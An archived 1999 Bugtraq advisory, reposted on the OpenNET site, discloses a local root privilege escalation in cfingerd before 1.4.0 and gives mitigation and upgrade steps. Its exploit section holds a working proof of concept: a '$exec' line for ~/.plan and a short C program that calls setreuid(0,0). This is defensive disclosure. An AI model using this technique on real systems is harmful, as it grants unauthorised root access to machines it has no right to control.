The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Хинт: SOLARIS.opennet.ru - мини-портал с информацией по ОС Solaris.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

Severe bug in cfingerd before 1.4.0


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Tue, 10 Aug 1999 20:34:37 +0200
From: Martin Schulze <joey@FINLANDIA.INFODROM.NORTH.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Severe bug in cfingerd before 1.4.0

--Nq2Wo0NMKNjxTN9z
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

Bugtraq Security Advisory
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

  A serious bug in cfingerd before version 1.4.0 has been reported.
  It is present in all versions of cfingerd from 1.2.0 up to any
  version of 1.3.2.  If configured accordingly this bug enables any
  local user to execute random programs with root priviledges.

  Although I haven't been quite verbose with development of cfingerd,
  Ken Hollis (the original author) has handed maintainership over to
  me a while ago.  I did some development and fixed some security
  related bugs, but never made an official release.  This is done now.

Affected systems
----------------

  All systems running a version of cfingerd beginning with version
  1.2.0 and before version 1.4.0 are affected.

  You are safe if you have disabled ALLOW_EXECUTION in your
  cfingerd.conf file in section "internal_config", i.e. that file
  contains a line "-ALLOW_EXECUTION".

  This is the default configuration of this package.  If you use the
  default cfingerd.conf file as shipped with the distribution you are
  safe.  You should still upgrade.

Recommended action
------------------

  1st Immediately turn off ALLOW_EXECUTION in your cfingerd.conf file.

  2nd Upgrade to the most recent version of cfingerd 1.4.0 to be found
      at the primary site
      ftp://ftp.infodrom.north.de/pub/people/joey/cfingerd/ or
      ftp://metalab.unc.edu/pub/Linux/system/network/finger/ .

Exploit
-------

  The exploit is quite simple.  Thanks go to Tadek Knapik
  <tadek@nautilus.uwoj.krakow.pl> who has informed me.

  You need to add

    $exec /tmp/relinq

  to your ~/.plan file.  Then compile the following relinq.c file in
  /tmp:

    #include <stdio.h>

    void main()
    {
	printf("Root exploit test\n");
	setregid(0, 0);
	setreuid(0, 0);
	printf("User: %d, group: %d.\n", getuid(), getgid());
    }

Checksum
--------

  File:   ftp://ftp.infodrom.north.de/pub/people/joey/cfingerd/cfingerd-1.4=
.0.tar.gz
  MD5sum: dcc25e89ba1dad6497365429b1db2909

Regards,

	Joey

--=20
Experience is something you don't get until just after you need it.

--Nq2Wo0NMKNjxTN9z
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia

iQCVAwUBN7BwvRRNm5Suj3z1AQH1aAP9HEhk0VT2C4SEWgjBO2SijspLYb0UcyG3
8Vv0XMpIcj7AvAsecC0OVMACvYs7FSon9p1DxuREJIr90SMSiMUlBGsQjrphXjfq
L9e1TVP6kExHFMVN7OiEaHpfxBxa0VDr6LiBIHf8gRfAmRtzGZrMw7NCJ4PY1Uax
XBPQ+sp2jr0=
=Y/zi
-----END PGP SIGNATURE-----

--Nq2Wo0NMKNjxTN9z--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network.
InterReklama Advertizing
Интерреклама. Интернет
RB2 Network.